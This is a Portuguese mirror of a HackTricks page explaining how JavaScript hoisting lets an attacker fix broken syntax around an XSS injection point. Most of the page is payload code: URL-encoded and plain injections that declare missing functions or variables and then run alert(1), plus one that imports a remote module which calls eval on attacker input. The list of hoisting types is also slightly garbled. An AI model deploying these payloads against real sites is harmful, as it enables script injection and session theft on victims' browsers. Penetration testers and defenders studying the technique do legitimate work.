mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-21 10:33:36 +00:00
155 lines
7.5 KiB
Markdown
155 lines
7.5 KiB
Markdown
# Elevação de JS
|
||
|
||
<details>
|
||
|
||
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Outras maneiras de apoiar o HackTricks:
|
||
|
||
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
||
</details>
|
||
|
||
## Informações Básicas
|
||
|
||
Na linguagem JavaScript, um mecanismo conhecido como **Elevação** é descrito, onde declarações de variáveis, funções, classes ou imports são conceitualmente elevadas ao topo de seu escopo antes que o código seja executado. Esse processo é automaticamente realizado pelo mecanismo JavaScript, que percorre o script em várias passagens.
|
||
|
||
Durante a primeira passagem, o mecanismo analisa o código para verificar erros de sintaxe e o transforma em uma árvore de sintaxe abstrata. Essa fase inclui a elevação, um processo onde certas declarações são movidas para o topo do contexto de execução. Se a fase de análise for bem-sucedida, indicando a ausência de erros de sintaxe, a execução do script prossegue.
|
||
|
||
É crucial entender que:
|
||
|
||
1. O script deve estar livre de erros de sintaxe para que a execução ocorra. As regras de sintaxe devem ser estritamente seguidas.
|
||
2. A posição do código dentro do script afeta a execução devido à elevação, embora o código executado possa diferir de sua representação textual.
|
||
|
||
#### Tipos de Elevação
|
||
|
||
Com base nas informações do MDN, existem quatro tipos distintos de elevação em JavaScript:
|
||
|
||
1. **Elevação de Valor**: Permite o uso do valor de uma variável dentro de seu escopo antes de sua linha de declaração.
|
||
2. **Elevação de Declaração**: Permite referenciar uma variável dentro de seu escopo antes de sua declaração sem causar um `ReferenceError`, mas o valor da variável será `undefined`.
|
||
3. Esse tipo altera o comportamento dentro de seu escopo devido à declaração da variável antes de sua linha de declaração real.
|
||
4. Os efeitos colaterais da declaração ocorrem antes do restante do código que a contém ser avaliado.
|
||
|
||
Em detalhes, as declarações de função exibem o comportamento de elevação do tipo 1. A palavra-chave `var` demonstra o comportamento do tipo 2. Declarações léxicas, que incluem `let`, `const` e `class`, mostram o comportamento do tipo 3. Por fim, as declarações `import` são únicas, pois são elevadas com os comportamentos dos tipos 1 e 4.
|
||
|
||
## Cenários
|
||
|
||
Portanto, se você tiver cenários onde pode **Injetar código JS após um objeto não declarado** ser usado, você poderia **corrigir a sintaxe** declarando-o (para que seu código seja executado em vez de gerar um erro):
|
||
```javascript
|
||
// The function vulnerableFunction is not defined
|
||
vulnerableFunction('test', '<INJECTION>');
|
||
// You can define it in your injection to execute JS
|
||
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
|
||
'-alert(1)-''); function vulnerableFunction(a,b){return 1};
|
||
|
||
//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
|
||
test'); function vulnerableFunction(a,b){ return 1 };alert(1)
|
||
```
|
||
|
||
```javascript
|
||
// If a variable is not defined, you could define it in the injection
|
||
// In the following example var a is not defined
|
||
function myFunction(a,b){
|
||
return 1
|
||
};
|
||
myFunction(a, '<INJECTION>')
|
||
|
||
//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
|
||
test'); var a = 1; alert(1);
|
||
```
|
||
|
||
```javascript
|
||
// If an undeclared class is used, you cannot declare it AFTER being used
|
||
var variable = new unexploitableClass();
|
||
<INJECTION>
|
||
// But you can actually declare it as a function, being able to fix the syntax with something like:
|
||
function unexploitableClass() {
|
||
return 1;
|
||
}
|
||
alert(1);
|
||
```
|
||
|
||
```javascript
|
||
// Properties are not hoisted
|
||
// So the following examples where the 'cookie' attribute doesn´t exist
|
||
// cannot be fixed if you can only inject after that code:
|
||
test.cookie('leo','INJECTION')
|
||
test['cookie','injection']
|
||
```
|
||
## Mais Cenários
|
||
```javascript
|
||
// Undeclared var accessing to an undeclared method
|
||
x.y(1,INJECTION)
|
||
// You can inject
|
||
alert(1));function x(){}//
|
||
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
|
||
x.y(1,alert(1));function x(){}//)
|
||
```
|
||
|
||
```javascript
|
||
// Undeclared var accessing 2 nested undeclared method
|
||
x.y.z(1,INJECTION)
|
||
// You can inject
|
||
");import {x} from "https://example.com/module.js"//
|
||
// It will be executed
|
||
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
|
||
|
||
|
||
// The imported module:
|
||
// module.js
|
||
var x = {
|
||
y: {
|
||
z: function(param) {
|
||
eval(param);
|
||
}
|
||
}
|
||
};
|
||
|
||
export { x };
|
||
```
|
||
|
||
```javascript
|
||
// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
|
||
// It was injected the: let config;`-alert(1)`//`
|
||
// With the goal of making in the block the var config be empty, so the return is not executed
|
||
// And the same injection was replicated in the body URL to execute an alert
|
||
|
||
try {
|
||
if(config){
|
||
return;
|
||
}
|
||
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
|
||
let config;`-alert(1)`//`+"
|
||
} catch {
|
||
fetch("/error", {
|
||
method: "POST",
|
||
body: {
|
||
url:"https://try-to-catch.glitch.me/"+`
|
||
let config;`-alert(1)-`//`+""
|
||
}
|
||
})
|
||
}
|
||
```
|
||
## Referências
|
||
|
||
* [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
|
||
* [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
|
||
* [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
|
||
|
||
<details>
|
||
|
||
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Outras maneiras de apoiar o HackTricks:
|
||
|
||
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|